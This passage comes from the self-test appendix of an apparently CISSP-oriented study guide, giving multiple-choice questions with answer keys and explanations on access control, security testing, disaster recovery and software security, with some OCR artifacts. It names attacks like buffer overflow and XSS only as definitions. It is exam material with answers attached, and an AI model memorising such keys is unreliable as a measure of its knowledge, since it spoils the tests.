incorrect because in RBAC users are not segregated from one another. 

7. What access control method weighs additional factors such as time of 

attempted access before granting access? 

A. Content-dependent access control 

B. Context-dependent access control 

C. Role-based access control 

D. Task-based access control 

Correct Answer and Explanation: B. Answer B is correct; Context-dependent 
access control adds additional factors beyond username and password, such as the 
time of attempted access. 

Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D are 
incorrect. Content-dependent access control uses the content (such as file contents) 
as an additional factor. Role-based control is based on the subject’s role. Task-based 
access control is based on the tasks the subject needs to perform. 

8 . What service is known as cloud identity, and allows organizations to leverage 

cloud service for identity management? 

A. IaaS 

B. IDaaS 

C. PaaS 

D. SaaS 

Correct Answer and Explanation: B. Answer B is correct; Identity as a Service, 
also called cloud identity, allows organizations to leverage cloud service for identity 
management. 

Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D are 
incorrect. IaaS (Infrastructure as a Service) provides an entire virtualized operat- 
ing system, which the customer configures from the OS on up. PaaS (Platform as a 
Service) provides a pre-configured operating system, and the customer configures 
the applications. SaaS (Software as a Service) is completely configured, from the 
operating system to applications, and the customer simply uses the application. 

9. A type II biometric is also known as what? 

A. Crossover Error Rate (CER) 

B. Equal Error Rate (EER) 
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C. False Accept Rate (FAR) 

D. False Reject Rate (FRR) 

Correct Answer and Explanation: C. Answer C is correct; the False Accept Rate 
(FAR) is known as a type II error. Remember that false accepts are normally worse 
than false rejects, and II is greater than I. 

Incorrect Answers and Explanations: A , B, and D. Answers A, B, and D are 
incorrect. The Crossover Error Rate (CER) and Equal Error Rate (EER) are syn- 
onyms used to gauge the accuracy of a biometric system. A False Reject Rate (FRR) 
is a type I error. 

10. Within Kerberos, which part is the single point of failure? 

A. The Ticket Granting Ticket 

B. The Realm 

C. The Key Distribution Center 

D. The Client-Server session key 

Correct Answer and Explanation: C. C is the correct answer because the KDC 
is the only service within Kerberos that can authenticate subjects. If the KDC loses 
availability, then ticket granting tickets will not be issued and no new authentications 
may take place. 

Incorrect Answers and Explanations: A, B, and D. A is incorrect because the 
TGT is received by the subject from the KDC. B is incorrect because the realm is a 
Kerberos network that shares authentication. D is incorrect because new C-S session 
keys can be issued. 

1 1 . What is an XML-based framework for exchanging security information, 

including authentication data? 

A. Kerberos 

B. OpenID 

C. SAML 

D. SESAME 

Correct Answer and Explanation: C. Answer C is correct; SAML is an XML- 
based framework for exchanging security information, including authentication data. 

Incorrect Answers and Explanations: A, B, and D. Answers A, B. and D are 
incorrect. Kerberos is a third-party authentication service that may be used to support 
Single Sign On. OpenID is a framework for exchanging authentication data, but is 
not XML-based. SESAME stands for Secure European System for Applications in 
a Multi-vendor Environment, a single sign-on system that supports heterogeneous 
environments 

1 2. What protocol provides a common open protocol for interfacing and querying 

directory service information provided by network operating systems, using 

port 389 via TCP or UDP? 

A. CHAP 

B. LDAP 
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C. PAP 

D. RADIUS 

Correct Answer and Explanation: B. Answer B is correct; Lightweight 
Directory Access Protocol, an open protocol for interfacing and querying direc- 
tory service information provided by network operating systems, using port 389 
via TCP or UDP. 

Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D are 
incorrect. CHAP, PAP and RADIUS do not provide directory service information 
provided by network operating systems, using port 389 via TCP or UDP. 

1 3. Server A trusts server B. Server B trusts Server C. Server A therefore trusts 
server C. What term describes this trust relationship? 

A. Domain trust 

B. Forest trust 

C. Nontransitive trust 

D. Transitive Trust 

Correct Answer and Explanation: D. D is the correct answer. Transitive trusts 
exist between two partners and all of their partners. For example: if A trusts B, in a 
transitive trust, A will trust B and all of B’s trust partners. 

Incorrect Answers and Explanations: A, B, and C. Domain and Forest trust are 
less-specific terms that are not required to be transitive. Nontransitive trust is the 
opposite of transitive trust. 

1 4. A policy that states a user must have a business requirement to view data 
before attempting to do so is an example of enforcing what? 

A. Least privilege 

B. Need to know 

C. Rotation of duties 

D. Separation of duties 

Correct Answer and Explanation: B. Answer B is correct; need to know means 
the user must have a need (requirement) to access a specific object before doing so. 

Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D are 
incorrect. Least privilege is less granular than need to know: users have the least 
amount of privilege to do their jobs, but objects are still typically grouped together 
(such as allowing access to all backup tapes for a backup administrator). Separation 
of duties is designed to divide sensitive tasks among multiple subjects. Rotation of 
duties is designed to mitigate collusion. 

1 5. What technique would raise the False Accept Rate (FAR) and Lower the False 
Reject Rate (FRR) in a fingerprint scanning system? 

A. Decrease the amount of minutiae that is verified 

B. Increase the amount of minutiae that is verified 

C. Lengthen the enrollment time 

D. Lower the throughput time 
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Correct Answer and Explanation: A. Answer A is correct; decreasing the amount 
of minutiae will make the accuracy of the system lower, which lower false rejects 
but raise false accepts. 

Incorrect Answers and Explanations: B , C, and D. Answers B, C, and D are 
incorrect. Increasing the amount of minutiae will make the system more accurate, 
increasing the FRR and lowering the FAR. Enrollment and throughput time are not 
directly connected to FAR and FRR. 


CHAPTER 7: DOMAIN 6: SECURITY ASSESSMENT 
AND TESTING 

1 . Which software testing level tests software after updates, modifications or 

patches? 

A. Acceptance Testing 

B. Integration Testing 

C. Regression Testing 

D. Unit Testing 

Correct Answer and Explanation: C. Answer C is correct; Regression Testing 
tests software after updates, modifications or patches. 

Incorrect Answers and Explanations: A, B, and D. Answers A , B, and D are 
incorrect. Acceptance Testing tests software to ensure the software meets the customer’s 
operational requirements. Integration Testing tests multiple software components 
as they are combined into a working system. Unit Testing tests low-level software 
components, such as functions, procedures or objects. 

2. What type of testing enters random malformed data as inputs into software 

programs to determine if they will crash? 

A. Black box testing 

B. Combinatorial testing 

C. Fuzzing 

D. Pairwise testing 

Correct Answer and Explanation: C. Answer C is correct; Fuzzing is a form of 
black box software testing that enters random malformed data as inputs into software 
programs to determine if they will crash. 

Incorrect Answers and Explanations: A, B, and D. Answers A, B. and D are 
incorrect. Black box testing gives the tester no internal details: the software is treated 
as a black box that receives inputs. Fuzzing is a form of black box testing and is 
more specific, so it is a better answer. Combinatorial software testing is a black box 
testing method that seeks to identify and test all unique combinations of software 
inputs. Pairwise testing is a form of combinatorial testing that identifies unique pairs 
of inputs. 
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3 . What type of software testing tests code passively? 

A. Black box testing 

B. Dynamic testing 

C. Static testing 

D. White box testing 

Correct Answer and Explanation: C. Answer C is correct; static testing tests code 
passively. This includes walkthroughs, syntax checking and code reviews. 

Incorrect Answers and Explanations: A, B, and D. Answers A, B, and D are 
incorrect. Black box testing gives the tester no internal details: the software is treated 
as a black box that receives inputs. Dynamic testing tests the code while executing 
it. White box software testing gives the tester access to program source code, data 
structures, variables, etc. 

4 . What type of penetration test begins with no external or trusted information, 

and begins the attack with public information only? 

A. Full knowledge 

B. Partial knowledge 

C. Grey box 

D. Zero knowledge 

Correct Answer and Explanation: D. Answer D is correct; A zero knowledge 
test begins with no external or trusted information, and begins the attack with public 
information only. 

Incorrect Answers and Explanations: A, B, and C. Answers A, B, and C are 
incorrect. A full-knowledge test (also called crystal-box) provides internal informa- 
tion to the penetration tester, including network diagrams, policies and procedures, 
and sometimes reports from previous penetration testers. Grey box is not a valid term 
on the exam. Partial-knowledge tests are in between zero and full knowledge; the 
penetration tester receives some limited trusted information. 

5 . What type of assessment would best demonstrate an organization’s compliance 

with PC1-DSS (Payment Card Industry Data Security Standard)? 

A. Audit 

B. Penetration test 

C. Security assessment 

D. Vulnerability assessment 

Correct Answer and Explanation: A. Answer A is correct; an audit is used to 
verify compliance with a published specification. 

Incorrect Answers and Explanations: B. C, and D. Answers B, C, and D are 
incorrect. A penetration test is designed to determine if an attacker can penetrate 
an organization. A security assessment is a holistic approach to assessing the effec- 
tiveness of access control. A vulnerability assessment is designed to discover poor 
configurations and missing patches in an environment. 
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6 . What type of test provides internal information to the penetration tester, 
including network diagrams, policies and procedures, and sometimes reports 
from previous penetration testers? 

A. Full knowledge 

B. Partial knowledge 

C. Grey box 

D. Zero knowledge 

Correct Answer and Explanation: A. Answer A is correct; A full-knowledge 
test provides internal information to the penetration tester, including network dia- 
grams, policies and procedures, and sometimes reports from previous penetration 
testers. 

Incorrect Answers and Explanations: B, C, and D. Answers B, C, and D are 
incorrect. Partial-knowledge tests are in between zero and full knowledge: the pen- 
etration tester receives some limited trusted information. Grey box is not a valid term 
on the exam. A zero knowledge test begins with no external or trusted information, 
and begins the attack with public information only. 

7. What can be used to ensure software meets the customer’s operational 
requirements? 

A. Integration testing 

B. Installation testing 

C. Acceptance testing 

D. Unit testing 

Correct Answer and Explanation: C. Answer C is correct; acceptance testing is 
designed to ensure the software meets the customer’s operational requirements. 

Incorrect Answers and Explanations: A, B, and D. Answers A, B. and D are 
incorrect. Integration testing tests multiple software components as they are com- 
bined into a working system. Installation testing tests software as it is installed and 
first operated. Unit Testing is a low-level test of software components, such as func- 
tions, procedures or objects. 

8. What term describes a no-tech or low-tech method that uses the human mind to 
bypass security controls? 

A. Fuzzing 

B. Social engineering 

C. War dialing 

D. Zero knowledge test 

Correct Answer and Explanation: B. Answer B is correct; social engineering 
is a no-tech or low-tech method that uses the human mind to bypass security 
controls. 

Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D are 
incorrect. Fuzzing is a type of black box testing that enters random malformed data 
as inputs into software programs to determine if they will crash. War dialing uses 
modems to dial a series of phone numbers, looking for an answering modem carrier 
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tone. A zero knowledge penetration test begins with no external or trusted informa- 
tion, and begins the attack with public information only. 

9 . What term describes a black-box testing method that seeks to identify and test 

all unique combinations of software inputs? 

A. Combinatorial software testing 

B. Dynamic testing 

C. Misuse case testing 

D. Static Testing 

Correct Answer and Explanation: A. Answer A is correct; Combinatorial soft- 
ware testing is a black-box testing method that seeks to identify and test all unique 
combinations of software inputs. 

Incorrect Answers and Explanations: B , C, and D. Answers B, C, and D are 
incorrect. Dynamic testing tests code while executing it. Misuse case testing formally 
models how security impact could be realized by an adversary abusing the applica- 
tion. Static testing tests the code passively; the code is not running. This includes 
walkthroughs, syntax checking, and code reviews. 

10 . What term describes a holistic approach for determining the effectiveness of 

access control, and has a broad scope? 

A. Security assessment 

B. Security audit 

C. Penetration test 

D. Vulnerability assessment 

Correct Answer and Explanation: A. Answer A is correct; A security assessment 
is a holistic approach for determining the effectiveness of access control, and has a 
broad scope. 

Incorrect Answers and Explanations: B , C, and D. Answers B, C, and D are in- 
correct. A security audit verifies compliance with an information security framework 
or standard. A penetration test is designed to determine if an attacker can penetrate an 
organization. A vulnerability assessment is designed to discover poor configurations 
and missing patches in an environment. 

Use the following scenario to answer questions 1 1 through 14: 

You are the CISO of a large bank and have hired a company to provide an overall 
security assessment, and also provide a penetration test of your organization. Your 
goal is to determine overall information security effectiveness. You are specifically 
interested in determining if theft of financial data is possible. 

Your bank has recently deployed a custom-developed three-tier web application 
that allows customers to check balances, make transfers, and deposit checks by tak- 
ing a photo with their smartphone and then uploading the check image. In addition 
to a traditional browser interface, your company has developed a smartphone app for 
both Apple iOS and Android devices. 

The contract has been signed, and both scope and rules of engagement have been 
agreed upon. A 24/7 operational IT contact at the bank has been made available in 
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case of any unexpected developments during the penetration test, including potential 
accidental disruption of services. 

1 1 . Assuming the penetration test is successful: what is the best way for the 
penetration testing firm to demonstrate the risk of theft of financial data? 

A. Instruct the penetration testing team to conduct a thorough vulnerability 
assessment of the server containing financial data 

B. Instruct the penetration testing team to download financial data, redact it, 
and report accordingly 

C. Instruct the penetration testing team that they may only download financial 
data via an encrypted and authenticated channel 

D. Place a harmless ‘flag’ file in the same location as the financial data, and 
inform the penetration testing team to download the flag 

Correct Answer and Explanation: D. Answer D is correct; A flag is a dummy file 
containing no regulated or sensitive data, placed in the same area of the system as the 
credit card data, and protected with the same permissions. If the tester can read and/or 
write to that file, then they prove they could have done the same to the credit card data. 

Incorrect Answers and Explanations: A, B , and C. Answers A, B, and C are incor- 
rect. Answer A is a vulnerability assessment, not a penetration test. Answers B and 
C are dangerous, and could involve unauthorized access of regulated data, such as 
health care records. 

1 2. What type of penetration test will result in the most efficient use of time and 
hourly consultant expenses? 

A. Automated knowledge 

B. Full knowledge 

C. Partial Knowledge 

D. Zero Knowledge 

Correct Answer and Explanation: B. Answer B is correct; a full knowledge test 
is far more efficient than other forms of penetration tests, allowing the penetration 
tester to find weaker areas more quickly. 

Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D are 
incorrect. Automated knowledge is not a valid exam term. Both zero and partial 
knowledge tests will be less efficient than full knowledge. 

1 3. You would like to have the security firm test the new web application, but have 
decided not to share the underlying source code. What type of test could be 
used to help determine the security of the custom web application? 

A. Secure compiler warnings 

B. Fuzzing 

C. Static testing 

D. White box testing 

Correct Answer and Explanation: B. Answer B is correct; Fuzzing is a black box 
testing method that does not require access to source code. 
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Incorrect Answers and Explanations: A, C, and D. Answers A , C, and D are 
incorrect. All are static methods that require access to source code. 

1 4. During the course of the penetration test: the testers discover signs of an active 
compromise of the new custom-developed three-tier web application. What is 
their best source of action? 

A. Attempt to contain and eradicate the malicious activity 

B. Continue the test 

C. Quietly end the test, immediately call the operational IT contact, and 
escalate the issue 

D. Shut the server down 

Correct Answer and Explanation: C. Answer C is correct; attackers will often 
become more malicious if they believe they have been discovered, sometimes vio- 
lating data and system integrity. The integrity of the system is at risk in this case, 
and the penetration tester should end the penetration test, and immediately escalate 
the issue. 

Incorrect Answers and Explanations: A, B, and D. Answers A, B. and D are 
incorrect. The client must be notified immediately, and incident handling is not the 
penetration tester’s responsibility. 

1 5. Drag and drop: Which of the following statements about Syslog are true? Drag 
and drop all correct answers from left to right. 


Possible Answers Correct Answers 


f \ 

Uses UDP 






Easily spoofed 

V 


FIGURE SELFTEST.5 Drag and Drop 
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Correct Answer and Explanation: Syslog uses UDP, which offers unreliable 
transport, so the data is easily spoofed. The data is also not encrypted. 

Incorrect Answers and Explanations: Syslog does not use TCP, is not encrypted, 
and uses no authentication. 


Possible Answers 


Correct Answers 


/ \ 

Uses TCP 

>. / 

/ \ 

Data is encrypted 

\ 


f \ 

Authenticated 

V / 


FIGURE SELFTEST.6 Drag and Drop Answer 


Uses UDP 


Data is plaintext 

V / 


Easily spoofed 


CHAPTER 8: DOMAIN 7: SECURITY OPERATIONS 

1 . What type of backup is obtained during the Response (aka Containment) phase 

of Incident Response? 

A. Incremental 

B. Full 

C. Differential 

D. Binary 

Correct Answer and Explanation: D. Answer D is correct; binary, or bit by bit, 
backups are what is obtained during the containment phase of incident response. 
Strong preference is also for a forensically sound binary backup that leverages a 
hashing algorithm to convey reliability. The other types of backups will not cap- 
ture unallocated space, and could cause the analyst to miss some data that had been 
marked for deletion. 
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Incorrect Answers and Explanations: A, B, and C. Answers A, B, and C are incor- 
rect. Incremental, Full, and Differential are all common backup techniques, but will 
only backup allocated space rather than the full drive. These techniques are used for 
simple backup/restore capabilities rather than incident response or forensics. 

2. What is the primary goal of disaster recovery planning (DRP)? 

A. Integrity of data 

B. Preservation of business capital 

C. Restoration of business processes 

D. Safety of personnel 

Correct Answer and Explanation: D. Answer D is correct; Loss of human life 
is the highest impact of any risk; personnel safety is the primary concern of all 
8 domains, including the business continuity and disaster recovery planning section 
of the Security Operations domain. 

Incorrect Answers and Explanations: A, B , and C. Answers A, B, and C are incor- 
rect. All are valid concerns, but none trump personnel safety. 

3 . What business process can be used to determine the outer bound of a 

Maximum Tolerable Downtime? 

A. Accounts receivable 

B. Invoicing 

C. Payroll 

D. Shipment of goods 

Correct Answer and Explanation: C. Answer C is correct; Most organizations should 
not allow unmanaged risk of two missed payrolls: if a company pays every 2 weeks, 
the maximum MTD would be 2 weeks. This is used to determine the outer bound; most 
organizations will determine a far lower MTD (sometimes in days, hours, or less). 

Incorrect Answers and Explanations: A, B, and D. Answers A, B. and D are 
incorrect. All are valid concerns, but the risk of being unable to pay personnel for 
two consecutive pay periods carries higher risk. 

4 . Your Maximum Tolerable Downtime is 48 hours. What is the most cost- 

effective alternate site choice? 

A. Cold 

B. Hot 

C. Redundant 

D. Warm 

Correct Answer and Explanation: D. Answer D is correct; A warm site is a data 
center with raised floor, power, utilities, computer peripherals, and fully configured 
computers; requiring 24-72 hours to become fully operational. 

Incorrect Answers and Explanations: A, B, and C. Answers A, B, and C are 
incorrect. A cold site has basic physical and environmental controls, but no computer 
systems. It normally takes a week or more to make fully operational. A hot site is 
a data center with a raised floor, power, utilities, computer peripherals, and fully 
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configured computers. A hot site takes hours to become fully operational, and is the 
second-most expensive option. A redundant site is an exact production duplicate of a 
system that has the capability to seamlessly operate all necessary IT operations, and 
is the most expensive option. 

5. A structured walkthrough test is also known as what kind of test? 

A. Checklist 

B. Simulation 

C. Tabletop Exercise 

D. Walkthrough Drill 

Correct Answer and Explanation: C. Answer C is correct; a structured walk- 
through is also known as a tabletop exercise. 

Incorrect Answers and Explanations: A, B, and D. Answers A , B. and D are 
incorrect. Checklist testing checks a list of all assets and processes required to recover 
from a disaster. Both Simulation and Walkthrough Drill recover from a simulated 
mock emergency. 

6 . Which type of backup will include only those files that have changed since the 

most recent Full backup? 

A. Full 

B. Differential 

C. Incremental 

D. Binary 

Correct Answer and Explanation: B. Answer B is correct; differential backups 
will only archive those files that have changed since the most recent full backup. 

Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D are 
incorrect. A full backup would archive all files regardless of whether they had changed 
or not. An incremental backup will only archive those files that have changed since 
the last incremental or full backup. Binary backups are used for forensics and inci- 
dent response purposes and will backup everything on the entire disk, both allocated 
and unallocated space. 

7 . Which type of tape backup requires a maximum of two tapes to perform a 

restoration? 

A. Differential backup 

B. Electronic vaulting 

C. Full backup 

D. Incremental backup 

Correct Answer and Explanation: A. Answer A is correct; Differential backups 
archive data that has changed since the last full backup. During restoration, at most 
only the last full and differential tapes are required. 

Incorrect Answers and Explanations: B. C, and D. Answers B, C, and D are 
incorrect. Electronic vaulting is a batch process that does not use tape. Full back- 
ups archive all data: only one tape is required to restore a full backup. Incremental 
Backups backup all data that has changed since the last full or incremental backup. 
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Depending on the timing of the restoration, multiple incremental tapes may be 
required in addition to the most recent full backup. 

8 . What statement regarding the Business Continuity Plan is true? 

A. BCP and DRP are separate, equal plans 

B. BCP is an overarching “umbrella” plan that includes other focused plans 
such as DRP 

C. DRP is an overarching “umbrella” plan that includes other focused plans 
such as BCP 

D. COOP is an overarching “umbrella” plan that includes other focused plans 
such as BCP 

Correct Answer and Explanation: B. Answer B is correct; The Business Continu- 
ity Plan is an umbrella plan that includes multiple specific plans, most importantly 
the Disaster Recovery Plan. 

Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D are 
incorrect. All incorrectly state that BCP is equal to, or a subset of other plans. 

9. Which HA solution involves multiple systems all of which are online and 

actively processing traffic or data? 

A. Active-active cluster 

B. Active-passive cluster 

C. Database shadowing 

D . Remote j ournaling 

Correct Answer and Explanation: A. Answer A is correct; an active-active cluster 
involves multiple systems all of which are online and actively processing traffic or 
data. This configuration is also commonly referred to as load balancing, and is espe- 
cially common with public facing systems such as Web server farms. 

Incorrect Answers and Explanations: B , C, and D. Answers B, C, and D are 
incorrect. An active-passive involves devices or systems that are already in place, 
configured, powered on and ready to begin processing network traffic should a 
failure occur on the primary system. Database shadowing uses two or more identical 
databases that are updated simultaneously. Remote journaling saves the database 
checkpoints and database journal to a remote site. In the event of failure at the 
primary site, the database may be recovered. 

1 0. What plan is designed to provide effective coordination among the managers 

of the organization in the event of an emergency or disruptive event? 

A. Call tree 

B. Continuity of Support Plan 

C. Crisis Management Plan 

D. Crisis Communications Plan 

Correct Answer and Explanation: C. Answer C is correct; the Crisis Management 
Plan (CMP) is designed to provide effective coordination among the managers of the 
organization in the event of an emergency or disruptive event. 
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Incorrect Answers and Explanations: A, B, and D. Answers A, B. and D are 
incorrect. The call tree works by assigning each employee a small number of other 
employees that are responsible for calling in an emergency event. The Continuity of 
Support Plan focuses narrowly on support of specific IT systems and applications. 
Crisis Communications Plan (sometimes simply called the communications plan); a 
plan for communicating to staff and the public in the event of a disruptive event. This 
plan is a subset of the CMP. 

1 1 . Which plan details the steps required to restore normal business operations 

after recovering from a disruptive event? 

A. Business Continuity Planning (BCP) 

B. Business Resumption Planning (BRP) 

C. Continuity of Operations Plan (COOP) 

D. Occupant Emergency Plan (OEP) 

Correct Answer and Explanation: B. Answer B is correct; Business Resumption 
Planning details the steps required to restore normal business operations after 
recovering from a disruptive event. 

Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D are 
incorrect. Business Continuity Planning develops a long-term plan to ensure the con- 
tinuity of business operations. The Continuity of Operations Plan describes the pro- 
cedures required to maintain operations during a disaster. The Occupant Emergency 
Plan provides the response procedures for occupants of a facility in the event a situa- 
tion poses a threat to the health and safety of personnel, the environment, or property. 

1 2. What metric describes how long it will take to recover a failed system? 

A. Minimum Operating Requirements (MOR) 

B. Mean Time Between Failures (MTBF) 

C. The Mean Time to Repair (MTTR) 

D. Recovery Point Objective (RPO) 

Correct Answer and Explanation: C. Answer C is correct; The Mean Time to 
Repair (MTTR) describes how long it will take to recover a failed system. It is the 
best estimate for reconstituting the IT system so that business continuity may occur. 

Incorrect Answers and Explanations: A, B, and D. Answers A , B. and D are 
incorrect. Minimum Operating Requirements describes the minimum environmental 
and connectivity requirements in order to operate computer equipment. Mean Time 
Between Failures quantifies how long a new or repaired system will run before fail- 
ing. The Recovery Point Objective (RPO) is the moment in time in which data must 
be recovered and made available to users in order to resume business operations. 

1 3. What metric describes the moment in time in which data must be recovered 

and made available to users in order to resume business operations? 

A. Mean Time Between Failures (MTBF) 

B. The Mean Time to Repair (MTTR) 

C. Recovery Point Objective (RPO) 

D. Recovery Time Objective (RTO) 
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Correct Answer and Explanation: C. Answer C is correct; The Recovery Point 
Objective (RPO) is the moment in time in which data must be recovered and made 
available to users in order to resume business operations. 

Incorrect Answers and Explanations: A, B, and D. Answers A , B. and D are 
incorrect. Mean Time Between Failures quantifies how long a new or repaired sys- 
tem will run before failing. Mean Time to Repair describes how long it will take 
to recover a failed system. Recovery Time Objective describes the maximum time 
allowed to recover business or IT systems. 

14. Maximum Tolerable Downtime (MTD) is comprised of which two metrics? 

A. Recovery Point Objective (RPO) and Work Recovery Time (WRT) 

B. Recovery Point Objective (RPO) and Mean Time to Repair (MTTR) 

C. Recovery Time Objective (RTO) and Work Recovery Time (WRT) 

D. Recovery Time Objective (RTO) and Mean Time to Repair (MTTR) 

Correct Answer and Explanation: C. Answer C is correct; The Recovery Time 
Objective (RTO, the time it takes to bring a failed system back online) and Work 
Recovery Time (WRT, the time required to configure a failed system) are used to 
calculate the Maximum Tolerable Downtime. RTO + WRT = MTD. 

Incorrect Answers and Explanations: A, B, and D. Answers A, B. and D are 
incorrect. Maximum Tolerable Downtime does not directly use Recovery Point 
Objective or Mean Time to Repair as metrics. 

1 5. Which level of RAID does NOT provide additionally reliability? 

A. RAID 1 

B. RAID 5 

C. RAID 0 

D. RAID 3 

Correct Answer and Explanation: C. Answer C is correct; RAID 0 provides only 
striping, and is used simply for performance purposes. It offers no additional data 
redundancy or resiliency. 

Incorrect Answers and Explanations: A, B, and D. Answers A, B. and D are 
incorrect. RAIDs 1, 3, and 5 all provide reliability gains through either mirroring or 
parity measures. 


CHAPTER 9: DOMAIN 8: SOFTWARE DEVELOPMENT 
SECURITY 

1 . What software design methodology uses paired programmers? 

A. Agile 

B. Extreme Programming (XP) 

C. Sashimi 

D. Scrum 
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Correct Answer and Explanation: B. Answer B is correct; Extreme Programming 
(XP) is an Agile development method that uses pairs of programmers who work off a 
detailed specification. There is a high level of customer involvement. 

Incorrect Answers and Explanations: A, C, and D. Answers A, C, and D are 
incorrect. Agile describes numerous development methodologies, including XP: XP 
is a better answer because it is more specific. Sashimi is a Waterfall Model variant. 
Scrum is a different Agile methodology that uses small teams. 

2 . What form of Artificial Intelligence uses a knowledge base and an inference 

engine? 

A. Artificial Neural Network (ANN) 

B. Bayesian Filtering 

C. Expert System 

D. Genetic Algorithm 

Correct Answer and Explanation: C. Answer C is correct; an expert system is 
comprised of two components: a knowledge base that consists of “if/then” state- 
ments. These statements contain rules that the expert system uses to make decisions. 
The second component is an inference engine. 

Incorrect Answers and Explanations: A, B , and D. Answers A, B, andD are incor- 
rect. Artificial Neural Networks (ANN) simulate neural networks found in humans 
and animals. Bayesian filtering uses mathematical formulas to assign probabilities 
to make decisions such as identifying spam. Genetic Algorithms and Programming 
fundamentally change the way software is developed: instead of being coded by a 
programmer, they evolve to solve a problem. 

3 . Which of the following definitions describe open source software? 

A. Freeware 

B. Gnu Public License (GPL) software 

C. Public domain software 

D. Software released with source code 

Correct Answer and Explanation: D. Answer D is correct; open source software 
has publicly released source code. 

Incorrect Answers and Explanations: A, B. and C. Answers A, B, and C are incor- 
rect. Freeware is software that is free of charge, whether source code is available or 
not. Software licensed with the GPL is free (libre), but not all open source software 
is licensed under the GPL. The same is true for public domain software. 

4 . What describes a more agile development and support model, where 

developers directly support operations? 

A. DevOps 

B. Sashimi 

C. Spiral 

D. Waterfall 

Correct Answer and Explanation: A. Answer A is correct; DevOps is a more agile 
development and support model, where developers directly support operations. 
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Incorrect Answers and Explanations: B, C, and D. Answers B, C, and D are 
incorrect. Sashimi, Spiral and Waterfall are software development methodologies 
that do not describe a model for developers directly supporting operations. 

5. At what phase of the Systems Development Life Cycle (SDLC) should security 

become part of the process? 

A. Before initiation 

B. During development/acquisition 

C. When the system is implemented 

D. SDLC does not include a security process 

Correct Answer and Explanation: A. Answer A is correct; Security is a criti- 
cal component of the entire SDLC process, typically beginning with a security plan 
before initiation. 

Incorrect Answers and Explanations: B. C, and D. Answers B, C, and D are 
incorrect. Security is the first step of the SDLC, and is part of every phase of the 
SDLC. 

6 . An object acts differently, depending on the context of the input message. 

What Object-Oriented Programming concept does this illustrate? 

A. Delegation 

B. Inheritance 

C. Polyinstantiation 

D. Polymorphism 

Correct Answer and Explanation: D. Answer D is correct; polymorphism (based 
on the Greek roots “poly” and “morph,” meaning many and forms, respectively): 
allows the ability to overload operators, performing different methods depending on 
the context of the input message. 

Incorrect Answers and Explanations: A, B, and C. Answers A , B, and C are 
incorrect. Delegation allows objects to delegate messages to other objects. Inheri- 
tance means an object inherits capabilities from its parent class. Polyinstantiation 
means “many instances,” two objects with the same names that have different data. 

7. Two objects with the same name have different data. What Object-Oriented 

Programming concept does this illustrate? 

A. Delegation 

B. Inheritance 

C. Polyinstantiation 

D. Polymorphism 

Correct Answer and Explanation: C. Answer C is correct; polyinstantiation 
means “many instances,” two objects with the same names that have different data. 

Incorrect Answers and Explanations: A, B, and D. Answers A, B. and D are 
incorrect. Delegation allows objects to delegate messages to other objects. Inheri- 
tance means an object inherits capabilities from its parent class. Polymorphism 
allows the ability to overload operators, performing different methods depending 
on the context of the input message. 
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8 . What type of testing determines whether software meets various end-state 

requirements, from a user or customer, contract or compliance perspective? 

A. Acceptance Testing 

B. Integration Testing 

C. Regression Testing 

D. Unit Testing 

Correct Answer and Explanation: A. Answer A is correct; Acceptance testing 
determines whether software meets various end-state requirements, from a user or 
customer, contract or compliance perspective. 

Incorrect Answers and Explanations: B, C, and D. Answers B, C, and D are 
incorrect. Integration testing tests multiple software components as they are combined 
into a working system. Regression testing tests software after updates, modifications 
or patches. Unit testing tests low-level tests of software components, such as func- 
tions, procedures or objects. 

9. A programmer allocates 20 bytes for a username variable, and an attacker 

enters a username that is 1,000 bytes long. All 1,000 bytes are copied to the 

stack. What type of attack did the attacker perform? 

A. Buffer Overflow 

B. Cross Site Scripting (XSS) 

C. Fuzzing 

D. Time of Check/Time of Use (TOC/TOU) 

Correct Answer and Explanation: A. Answer A is correct; a buffer overflow 
occurs when a programmer does not perform variable bounds checking, 

Incorrect Answers and Explanations: B, C, and D. Answers B, C, and D are 
incorrect. Cross-Site Scripting (XSS) leverages third-party execution of web 
scripting languages such as JavaScript within the security context of a trusted site. 
Fuzzing is a form of black box software testing that enters random malformed 
data as inputs into software programs to determine if they will crash. Time of 
Check/Time of Use (TOCTOU) attacks are also called race conditions: an attacker 
attempts to alter a condition after it has been checked by the operating system, but 
before it is used. 

1 0. What type of database language is used to create, modify and delete tables? 

A. Data Definition Language (DDL) 

B. Data Manipulation Language (DML) 

C. Database Management System (DBMS) 

D. Structured Query Language (SQL) 

Correct Answer and Explanation: A. Answer A is correct; Data Definition 
Language (DDL) is used to create, modify and delete tables. 

Incorrect Answers and Explanations: B, C, and D. Answers B, C, and D are 
incorrect. Data Manipulation Language (DML) is used to query and update data 
stored in the tables. Database Management System (DBMS) manages the database 


Appendix: Self Test 519 


system and provides security features. Structured Query Language (SQL) is a data- 
base query language that includes both DDL and DML. DDL is more specific than 
SQL, so it is a better answer for this question. 

1 1 . A database contains an entry with an empty primary key. What database 

concept has been violated? 

A. Entity Integrity 

B. Normalization 

C. Referential Integrity 

D. Semantic Integrity 

Correct Answer and Explanation: A. Answer A is correct; Entity integrity means 
each tuple has a unique primary key that is not null. 

Incorrect Answers and Explanations: B , C, and D. Answers B, C, and D are 
incorrect. Normalization seeks to make the data in a database table logically concise, 
organized and consistent. Referential integrity means that every foreign key in a sec- 
ondary table matches a primary key in the parent table: if this is not true, referential 
integrity has been broken. Semantic integrity means each attribute (column) value is 
consistent with the attribute data type. 

1 2. Which vulnerability allows a third party to redirect static content within the 

security context of a trusted site? 

A. Cross-Site Request Forgery (CSRF) 

B. Cross-Site Scripting (XSS) 

C. PHP Remote File Inclusion (RFI) 

D. SQL Injection 

Correct Answer and Explanation: A. Answer A is correct; Cross-Site Request 
Forgery (CSRF) allows a third party to redirect static content within the security 
context of a trusted site. 

Incorrect Answers and Explanations: B , C, and D. Answers B. C, and D are 
incorrect. Cross-Site Scripting (XSS): third party execution of Web scripting lan- 
guages such as Javascript within the security context of a trusted site. XSS is similar 
to CSRF; the difference is XSS uses active code. PHP Remote File Inclusion (RFI): 
alters normal PHP variables to reference remote content, which can lead to execu- 
tion of malicious PHP code. SQL Injection manipulates a back-end SQL server via 
